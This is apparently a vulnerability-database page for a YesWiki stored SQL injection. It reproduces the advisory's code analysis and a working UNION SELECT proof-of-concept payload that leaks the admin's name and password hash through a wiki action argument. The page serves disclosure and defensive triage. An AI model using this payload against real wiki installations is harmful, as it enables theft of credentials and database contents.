CVE-2026-52763

MEDIUMPre-NVD 6.56.5
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 6.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
6.5
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: CVSS: 6.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

YesWiki: SQL injection via the recentchanges action period argument leads to arbitrary DB read

Summary

The recentchanges action (actions/recentchanges.php) accepts a period argument from two disjoint parameter spaces: the URL query string ($_GET['period']) and the action invocation {{recentchanges period="..."}}. A whitelist at line 17 validates only the URL form against ['day','week','month']. The action-argument form takes the else branch at line 33 ($dateMin = $this->GetParameter('period')) with no validation, and the value flows into PageManager::getRecentlyChanged() (includes/services/PageManager.php:196), where it is interpolated into a WHERE time >= '...' ORDER BY time DESC clause without escaping or parameterization. UNION-based injection succeeds, the leaked rows render into the response page via actions/recentchanges.php:43,58 (ComposeLinkToPage($page['tag'])), so any visitor of the trigger page sees the exfiltrated data.

The vulnerability provides arbitrary read of the YesWiki database to anyone who can save the trigger page. On a default install (default_write_acl='*'), this includes anonymous users, subject to the hashcash JS check on the page-edit form. Once the trigger page is saved, every subsequent view fires the injection as the SQLi is stored. Stored SQL injection is reachable through the page-edit flow, with arbitrary database read.

Details

Two issues compose the vulnerability.

  • actions/recentchanges.php line 33 reads the action argument and skips the whitelist.

if (isset($_GET['period']) && in_array($_GET['period'], ['day', 'week', 'month'])) {
       switch ($_GET['period']) {
           case 'day':   $d = strtotime('-1 day');   $dateMin = date('Y-m-d H:i:s', $d); break;
           case 'week':  $d = strtotime('-1 week');  $dateMin = date('Y-m-d H:i:s', $d); break;
           case 'month': $d = strtotime('-1 month'); $dateMin = date('Y-m-d H:i:s', $d); break;
       }
   } else {
       $dateMin = $this->GetParameter('period');   
   }

Wiki::GetParameter() (includes/YesWiki.php:895) reads $this->parameter[$key], which is populated from the {{action key=value}} argument list — disjoint from $_GET. The whitelist's if branch only runs when $_GET['period'] matches one of three exact values; in every other case the else branch reads the action argument with no validation, no escaping, no DateTime parse, no regex. The two parameter spaces are independent.

  • In includes/services/PageManager.php, PageManager::getRecentlyChanged() interpolates the value into SQL.

public function getRecentlyChanged($limit = 50, $minDate = ''): ?array
   {
       if (!empty($minDate)) {
           if ($pages = $this->dbService->loadAll(
               'select id, tag, time, user, owner from' . $this->dbService->prefixTable('pages')
               . "where latest = 'Y' and comment_on = '' and time >= '$minDate' order by time desc"
           )) {
               return $pages;
           }
       }
   }

$minDate is interpolated raw into the query and there is no $this->dbService->escape($minDate) and no parameter binding and no format check.

The default action ACL for recentchanges is * (includes/YesWiki.php:1100, GetModuleACL), so Performer::CheckModuleACL('recentchanges', 'action') returns true for everyone. The injection runs whenever a viewer reaches a page that embeds the action with a malicious period argument.

PoC

Default fresh install so default_write_acl='*'.

  • place the SQLi payload on a page

{{recentchanges period="2000-01-01' UNION SELECT 9999 AS id, CONCAT('LEAK_', name, '_', SUBSTRING(password,1,32)) AS tag, NOW() AS time, name AS user, name AS owner FROM yeswiki_users WHERE name='AdminUser' -- "}}

The five UNION columns match the id, tag, time, user, owner projection that getRecentlyChanged selects. The tag column is rendered into the response as a hyperlink, exfiltrating the leaked data.

  • anyone visits the page

GET /? HTTP/1.1
Host: target.example

The injected query executes server-side; the tag column is rendered into the page in actions/recentchanges.php:43,58 via ComposeLinkToPage($page['tag']).

Impact

Arbitrary read of any DB column the application's MySQL user can access.

CVSS v3
6.5
EG Score
6.5(low)
EPSS
KEV
Not listed

Published

July 9, 2026

Last Modified

July 9, 2026

Vendor Advisories for CVE-2026-52763(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 7× in last 7d / 7× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 21:31 UTCEG score recompute
  2. 2026-07-14 21:33 UTCEG score recompute
  3. 2026-07-13 21:36 UTCEG score recompute
  4. 2026-07-12 21:39 UTCEG score recompute
  5. 2026-07-11 21:41 UTCEG score recompute
  6. 2026-07-10 21:44 UTCEG score recompute
  7. 2026-07-09 21:46 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-52763?
CVE-2026-52763 is a medium vulnerability published on July 9, 2026. YesWiki: SQL injection via the recentchanges action period argument leads to arbitrary DB read Summary The recentchanges action (actions/recentchanges.php) accepts a period argument from two disjoint parameter spaces: the URL query string ($_GET['period']) and the action invocation {{recentchanges…
When was CVE-2026-52763 disclosed?
CVE-2026-52763 was first published in the National Vulnerability Database on July 9, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-52763?
CVE-2026-52763 has a CVSS v4.0 base score of 6.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-52763?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-52763, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-52763

Explore →

Is Your Infrastructure Affected by CVE-2026-52763?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.